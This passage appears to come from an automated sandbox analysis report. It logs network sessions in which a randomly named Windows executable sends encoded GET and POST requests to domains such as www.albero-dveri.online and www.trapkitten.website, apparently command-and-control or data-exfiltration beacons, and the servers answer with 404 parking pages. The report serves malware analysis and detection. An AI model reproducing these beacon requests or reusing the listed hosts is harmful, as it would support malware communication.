                      Data Ascii: 4rl8h=uVl3vCC0V900qZmVHBM4JxX6ZNtcIBmbGAmzp/LDNupcTUuojKEcs/iW1JsLpuS1BkiJQx2kIvm/sPbpxE4adxF5i+cbITpWQFjHLU+l9vt4s32e2UR/rGD1Wv6VtOHzzYsS7V5du0DsiZc+VJlYuXlGNhqxFDBX7biy1/sssG4v28R3ea9pNEtg27vtbpZpgU/ylqJZsObizvgjkbH4N5PS82CdTvaWeBwdxNt4iRX/VVvGsiutX0J2hXkMs86MW1vj9NzBT1LVX3T/91CJSIOjQbE1JVFcbj/o5ltT/b0a62szWgxPeJR8affBdQg9M4684Tj4ONWDqhWFcBdMn+Etx/UqVD4MytVuXfkee55ih5g1c/zXh1ZY/8lhjRFQmC1jj34V4iPcyKuv2TCgCWMd6j3Y7JpQ3vKDTf47duf5++1byJ5o5iA8SSlrOPBSSYNoTIVM+3GVYJAMpSgzjeKdmXzUJ89B5sWBPADvBtfkm+JhryMX3ThbyoN21EmpG9Cm4yu3n8s8KHHZWtHJeSZ1/zVgI7tRKHX1WbPLOSddnaQkxxJeRPcnv80n/FGHZFmKagXVsCvH9JgbWu39gjF8DG3O1rBWjTXUzk38SxiCfpUwsKDkyhX2NH8R2USrwt2HFF+p3Q7wPDHBZlnnVaZhLvPChXoY/thDn0vOK8tZudq6s2EikpzkklV7BpJPXaxuo3bIiok7yYQ1wvsgHvzzOk2NYtWeEUvNfgRwE138NdJekbVb9X3+t1L+aD9CSyn1QtJj3TPjrCId8/Dw6DZhHZhbOjk/aw2D/vabHzgprY+TiYm3kKi1YGn0ZGJiqeCL3K6qK9AVZkt4SncYLZN/FXb1VU1X64r2+7Pj70O1NfLbyBjpjKlWpNypBQfvOqehf+3ggHaHBFYBD5qVPWxc3t+muZW5B9O+gC18jxwiigaVbUdY0JpSn47ZoT4umFfdDDzKJRxByjWnNyjowDQvFO2JwYg3cLG5zvkEgsXNM8 [TRUNCATED]
                      Sep 22, 2024 18:04:16.345988989 CEST778INHTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:04:16 GMT
                      Content-Type: text/html
                      Content-Length: 634
                      Connection: close
                      Server: Apache
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      24192.168.2.449761195.161.68.8801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:04:18.267949104 CEST484OUTGET /0dae/?CfmHC=h4QXpn780jb&4rl8h=jXNXsyq5R/QDxa7bJ2ljemvTesZ1LTXEaXuC8OrACrNOR23rlYUr+PSW9bwqyvvRK2/UTV39N9+HzvOrg18nL3Fjm+gENjZiKF7fGS3+8e9UoB+RgXgdxF4= HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.trapkitten.website
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Sep 22, 2024 18:04:19.030797958 CEST778INHTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:04:18 GMT
                      Content-Type: text/html
                      Content-Length: 634
                      Connection: close
                      Server: Apache
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      25192.168.2.449762194.58.112.174801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:04:24.297266960 CEST761OUTPOST /vyk8/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.albero-dveri.online
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 202
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.albero-dveri.online
                      Referer: http://www.albero-dveri.online/vyk8/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Raw: 34 72 6c 38 68 3d 79 2b 2b 64 6d 79 79 55 76 6d 36 34 2b 46 44 44 33 32 6e 30 58 65 77 55 4c 42 68 62 2f 43 53 6f 65 75 66 70 4a 53 41 58 47 38 58 4e 38 72 56 6a 2b 38 50 72 70 42 35 36 51 79 48 56 4b 73 4f 62 30 69 64 74 64 59 4a 43 71 48 67 57 4b 57 4e 78 61 56 69 66 44 49 63 78 6d 69 6c 7a 48 4a 37 39 6b 63 70 4b 65 59 30 7a 47 2b 72 32 6c 38 45 42 47 30 33 76 6d 50 4b 32 34 7a 45 4d 51 2f 66 59 4e 34 6a 7a 61 75 57 66 66 43 53 41 49 67 71 45 42 63 46 70 33 69 77 2b 2f 2f 65 66 31 32 72 4d 59 42 41 69 47 55 4c 63 79 78 39 44 69 77 6f 46 69 4d 79 77 62 45 48 50 58 44 34 69 4f 59 4e 6d 2f 41 3d 3d
                      Data Ascii: 4rl8h=y++dmyyUvm64+FDD32n0XewULBhb/CSoeufpJSAXG8XN8rVj+8PrpB56QyHVKsOb0idtdYJCqHgWKWNxaVifDIcxmilzHJ79kcpKeY0zG+r2l8EBG03vmPK24zEMQ/fYN4jzauWffCSAIgqEBcFp3iw+//ef12rMYBAiGULcyx9DiwoFiMywbEHPXD4iOYNm/A==
                      Sep 22, 2024 18:04:25.260416985 CEST1236INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Sun, 22 Sep 2024 16:04:24 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Content-Encoding: gzip
                      Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
                      Data Ascii: e36Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkn[Tcxn:EF){Ja8Q[@m|Ei!fwhgrI*apc-[fH.#bc{+Gc/7Yu+$L`qh(Rs6TjU!;2(a2C63EH#eTo -gnCJ-2_+,1t'ZnuxTPZi9UGOaq6v5<?""u_{x'~,o;x/M>Hn.~Uo/ypRCjm(g-g3x||-*e%n}7LOn-[XG>jRg79bT-|x#9603t~D31Jw(dxXL?a>g)="3cJH?miEZ@lTy\i{0Pv:T%hZNh=eKX|I+Q`F&s(K&)./|:uS[(d-Z5`3d/QI5B0kx7G^IrS38Zp(978@uS(4B& a27$+8Ib2NaQ [TRUNCATED]
                      Sep 22, 2024 18:04:25.260729074 CEST1236INData Raw: 74 e0 41 a3 ef 69 fb 74 d6 89 f9 0b 4c eb 1a 03 78 b5 e3 b5 5c b5 11 19 da c3 31 61 14 f8 5e f7 e9 46 01 2d 03 ee 36 45 b5 7f 01 bd 08 61 50 ef e3 f8 1e 70 c6 23 4c b1 ed ac ff 6a e5 84 a3 b6 36 79 2e 49 db 07 ef 0d 10 34 3d 85 71 ff 8c 50 78 3f
                      Data Ascii: tAitLx\1a^F-6EaPp#Lj6y.I4=qPx?.8<N{7\L*[Fy[`%Qt7Y]F>p`G5.0MN[mr'H?_V!3xHC|G'ZLtCrfzqJw'+@],Hn
                      Sep 22, 2024 18:04:25.260740042 CEST1236INData Raw: ba bc 8b a7 b2 4a 64 c1 ff 24 fa 64 d6 03 79 e9 b0 2c f2 f4 34 c5 18 27 e3 8b 11 99 6d d0 39 ad 05 fd 51 94 a7 bc a0 98 d8 22 91 e6 2c 81 33 e5 c2 b9 05 9a 23 4d 06 ab 3f 02 93 7e ca d1 1f 1b 5e 46 3b e4 39 2a e2 6f b8 1b 50 ad 53 0f 90 78 0d 9b
                      Data Ascii: Jd$dy,4'm9Q",3#M?~^F;9*oPSx|MU8 ~z(/#}JTs8Ld9<rP3=X{M<Dgnt*=JO\AF|KpynxK//M#lr+qOnD9o
                      Sep 22, 2024 18:04:25.261538029 CEST116INData Raw: c6 97 e8 bd dc ab b0 90 ad 0a b5 38 72 d8 74 42 3f e0 22 1e f7 7a d1 c8 9e 9f 45 31 ce a6 9d 41 57 bf 6d 9b bb 92 2d 0a 61 56 26 2f 5e c1 d1 21 37 9e 05 fa 70 2c 3c f4 39 2b db a1 ef 8e 22 b5 22 e8 aa e4 ac 71 06 3f c3 2b 2b 25 21 5d 3c 94 22 47
                      Data Ascii: 8rtB?"zE1AWm-aV&/^!7p,<9+""q?++%!]<"G)dRu,GO/x)0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      26192.168.2.449763194.58.112.174801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:04:26.854497910 CEST781OUTPOST /vyk8/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.albero-dveri.online
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 222
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.albero-dveri.online
                      Referer: http://www.albero-dveri.online/vyk8/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Raw: 34 72 6c 38 68 3d 79 2b 2b 64 6d 79 79 55 76 6d 36 34 38 6b 54 44 6b 6c 2f 30 44 4f 77 56 4f 42 68 62 30 69 53 73 65 70 58 70 4a 51 73 48 46 4f 6a 4e 38 4c 6c 6a 2f 34 62 72 75 42 35 36 62 53 48 51 41 4d 4f 51 30 69 51 51 64 64 78 43 71 48 6b 57 4b 55 46 78 62 69 2b 59 44 59 63 33 76 43 6c 78 61 35 37 39 6b 63 70 4b 65 59 51 64 47 2b 7a 32 6d 4d 30 42 45 56 33 75 75 76 4b 33 2f 7a 45 4d 55 2f 66 63 4e 34 69 57 61 72 79 35 66 42 36 41 49 6c 75 45 42 4f 74 6d 73 79 78 55 67 50 66 77 35 6c 50 42 42 53 52 69 46 57 44 43 7a 42 70 51 71 57 35 66 7a 39 54 6e 4a 45 6a 38 4b 45 78 57 44 62 77 76 6b 45 7a 4d 69 6a 37 48 6d 73 75 77 69 37 62 6a 38 45 78 6e 46 6d 51 3d
                      Data Ascii: 4rl8h=y++dmyyUvm648kTDkl/0DOwVOBhb0iSsepXpJQsHFOjN8Llj/4bruB56bSHQAMOQ0iQQddxCqHkWKUFxbi+YDYc3vClxa579kcpKeYQdG+z2mM0BEV3uuvK3/zEMU/fcN4iWary5fB6AIluEBOtmsyxUgPfw5lPBBSRiFWDCzBpQqW5fz9TnJEj8KExWDbwvkEzMij7Hmsuwi7bj8ExnFmQ=
                      Sep 22, 2024 18:04:27.533940077 CEST1236INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Sun, 22 Sep 2024 16:04:27 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Content-Encoding: gzip
                      Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
                      Data Ascii: e36Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkn[Tcxn:EF){Ja8Q[@m|Ei!fwhgrI*apc-[fH.#bc{+Gc/7Yu+$L`qh(Rs6TjU!;2(a2C63EH#eTo -gnCJ-2_+,1t'ZnuxTPZi9UGOaq6v5<?""u_{x'~,o;x/M>Hn.~Uo/ypRCjm(g-g3x||-*e%n}7LOn-[XG>jRg79bT-|x#9603t~D31Jw(dxXL?a>g)="3cJH?miEZ@lTy\i{0Pv:T%hZNh=eKX|I+Q`F&s(K&)./|:uS[(d-Z5`3d/QI5B0kx7G^IrS38Zp(978@uS(4B& a27$+8Ib2NaQ [TRUNCATED]
                      Sep 22, 2024 18:04:27.534173965 CEST1236INData Raw: 74 e0 41 a3 ef 69 fb 74 d6 89 f9 0b 4c eb 1a 03 78 b5 e3 b5 5c b5 11 19 da c3 31 61 14 f8 5e f7 e9 46 01 2d 03 ee 36 45 b5 7f 01 bd 08 61 50 ef e3 f8 1e 70 c6 23 4c b1 ed ac ff 6a e5 84 a3 b6 36 79 2e 49 db 07 ef 0d 10 34 3d 85 71 ff 8c 50 78 3f
                      Data Ascii: tAitLx\1a^F-6EaPp#Lj6y.I4=qPx?.8<N{7\L*[Fy[`%Qt7Y]F>p`G5.0MN[mr'H?_V!3xHC|G'ZLtCrfzqJw'+@],Hn
                      Sep 22, 2024 18:04:27.534192085 CEST448INData Raw: ba bc 8b a7 b2 4a 64 c1 ff 24 fa 64 d6 03 79 e9 b0 2c f2 f4 34 c5 18 27 e3 8b 11 99 6d d0 39 ad 05 fd 51 94 a7 bc a0 98 d8 22 91 e6 2c 81 33 e5 c2 b9 05 9a 23 4d 06 ab 3f 02 93 7e ca d1 1f 1b 5e 46 3b e4 39 2a e2 6f b8 1b 50 ad 53 0f 90 78 0d 9b
                      Data Ascii: Jd$dy,4'm9Q",3#M?~^F;9*oPSx|MU8 ~z(/#}JTs8Ld9<rP3=X{M<Dgnt*=JO\AF|KpynxK//M#lr+qOnD9o
                      Sep 22, 2024 18:04:27.534605980 CEST904INData Raw: 09 5f 1d 5f 92 dd 37 f0 be a1 52 a6 76 e5 ea fa 89 cb 13 09 f5 80 26 ee cf d1 bd 9c 1d 48 a5 4e 93 47 2b f6 61 0b 83 b6 f4 55 52 8b 60 bf 9a 7e 3e f0 32 2c c0 4d 11 eb e7 75 19 f5 4c fa e6 0f 2a 55 e8 ab bc 84 47 11 6e 1b 4f 0a 1a da c5 0a a6 49
                      Data Ascii: __7Rv&HNG+aUR`~>2,MuL*UGnOI#'L:{*t^bfd\r^EXW<N5k6R!apk?zA)8Dyp(`uYQv<\_B/-DV!W-ymWy;|`jn;F


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      27192.168.2.449764194.58.112.174801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:04:29.391489029 CEST10863OUTPOST /vyk8/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.albero-dveri.online
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 10302
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.albero-dveri.online
                      Referer: http://www.albero-dveri.online/vyk8/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Raw: 34 72 6c 38 68 3d 79 2b 2b 64 6d 79 79 55 76 6d 36 34 38 6b 54 44 6b 6c 2f 30 44 4f 77 56 4f 42 68 62 30 69 53 73 65 70 58 70 4a 51 73 48 46 4f 62 4e 38 34 64 6a 2b 66 33 72 76 42 35 36 59 53 48 52 41 4d 4f 4e 30 69 59 55 64 64 73 35 71 45 4d 57 4c 32 39 78 53 33 4b 59 57 6f 63 33 69 69 6c 79 48 4a 36 2f 6b 63 5a 47 65 59 41 64 47 2b 7a 32 6d 4b 51 42 41 45 33 75 73 76 4b 32 34 7a 45 51 51 2f 66 34 4e 34 72 72 61 71 79 70 66 77 61 41 49 46 65 45 41 37 78 6d 78 69 77 79 6a 50 66 6f 35 6c 79 42 42 55 31 55 46 58 33 6b 7a 44 31 51 76 43 59 47 76 63 54 6b 53 31 48 6d 61 31 4e 47 48 4d 4a 32 6b 47 58 4a 6d 7a 6e 7a 7a 50 6d 43 6b 4a 43 53 71 42 74 65 61 6a 4a 46 62 55 4f 4b 4d 4d 6d 4f 4c 39 6d 4f 61 79 59 59 38 32 53 6a 76 72 77 56 67 63 4e 32 31 59 4e 38 37 4a 64 56 5a 65 6b 72 63 66 35 76 4a 72 45 31 61 4a 52 45 2b 62 37 34 2f 44 5a 72 6d 62 2b 30 58 30 64 74 61 2f 34 62 75 42 44 6c 78 2b 48 55 44 47 6c 41 5a 45 34 55 36 64 4f 61 7a 78 64 59 54 48 35 65 59 6c 75 57 56 56 50 77 2b 61 58 39 77 44 70 66 [TRUNCATED]
                      Data Ascii: 4rl8h=y++dmyyUvm648kTDkl/0DOwVOBhb0iSsepXpJQsHFObN84dj+f3rvB56YSHRAMON0iYUdds5qEMWL29xS3KYWoc3iilyHJ6/kcZGeYAdG+z2mKQBAE3usvK24zEQQ/f4N4rraqypfwaAIFeEA7xmxiwyjPfo5lyBBU1UFX3kzD1QvCYGvcTkS1Hma1NGHMJ2kGXJmznzzPmCkJCSqBteajJFbUOKMMmOL9mOayYY82SjvrwVgcN21YN87JdVZekrcf5vJrE1aJRE+b74/DZrmb+0X0dta/4buBDlx+HUDGlAZE4U6dOazxdYTH5eYluWVVPw+aX9wDpf41wTJgIOdYwCcCbjlVCUnodCsJNh1MFfTdqJFfngyetklooJo+8dIQy41IpdFy4R6b7o1MVOlZVJniGhGv/A+ZJMoEwltzX00Wknd2BmqQSsgZyarSu7IJLWU08AjagmFOBlGZpbE9CyWOfgOFzs6Ox7ruebCD6pPUYutrbWO/DuWjloP3+a2U80ZBWl03IPRohLDMhYk9T+iKOL/X64KDM326Ar2r1husxr3XWf4k1LmowwwvsKf+UBG2Tk0qUaxnW7wPcYhkXUMCr+RrpIE8vAREuM8Y+7QXYg2q7reFwvr8jX+W2BB0CBS6y3e+O+NCWs/jKyrz5H+K2ur8gGjDNqMZTWaKfHFJm8qxo4uPbL8Tl/UFnD1Km9YuIrNAgSq7gr5wmpnKSYE8zUbeG4aXX+e2FeOjMAilgx1zA1piVCTtPp/O9Fehqwn8yOdC+rqHvL72E1zwQPgRZA0l6bIpOnzqCh4GaJiwc9WNMe4MqXXFaZx98G7h3U3w2/gghgOAA3S5HErutR7vZePaGuOmB3TsyMQykUZtw104ifMzCN9gEgGILfm3IGDiM9SXwZJw16W/kQqUeD5RRvqG4GV2mh4QNR1FB45FoRI3L8Xwng+VeA316fGWxDFeHyHTChnBzcPc48E73/U/7hvvqbLHSUhDnMld+Ixt [TRUNCATED]
                      Sep 22, 2024 18:04:30.089948893 CEST1236INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Sun, 22 Sep 2024 16:04:29 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Content-Encoding: gzip
                      Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
                      Data Ascii: e36Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkn[Tcxn:EF){Ja8Q[@m|Ei!fwhgrI*apc-[fH.#bc{+Gc/7Yu+$L`qh(Rs6TjU!;2(a2C63EH#eTo -gnCJ-2_+,1t'ZnuxTPZi9UGOaq6v5<?""u_{x'~,o;x/M>Hn.~Uo/ypRCjm(g-g3x||-*e%n}7LOn-[XG>jRg79bT-|x#9603t~D31Jw(dxXL?a>g)="3cJH?miEZ@lTy\i{0Pv:T%hZNh=eKX|I+Q`F&s(K&)./|:uS[(d-Z5`3d/QI5B0kx7G^IrS38Zp(978@uS(4B& a27$+8Ib2NaQ [TRUNCATED]
                      Sep 22, 2024 18:04:30.090130091 CEST224INData Raw: 74 e0 41 a3 ef 69 fb 74 d6 89 f9 0b 4c eb 1a 03 78 b5 e3 b5 5c b5 11 19 da c3 31 61 14 f8 5e f7 e9 46 01 2d 03 ee 36 45 b5 7f 01 bd 08 61 50 ef e3 f8 1e 70 c6 23 4c b1 ed ac ff 6a e5 84 a3 b6 36 79 2e 49 db 07 ef 0d 10 34 3d 85 71 ff 8c 50 78 3f
                      Data Ascii: tAitLx\1a^F-6EaPp#Lj6y.I4=qPx?.8<N{7\L*[Fy[`%Qt7Y]F>p`G5.0MN[mr'H?_V!3xHC|G'ZLtCrfzqJw
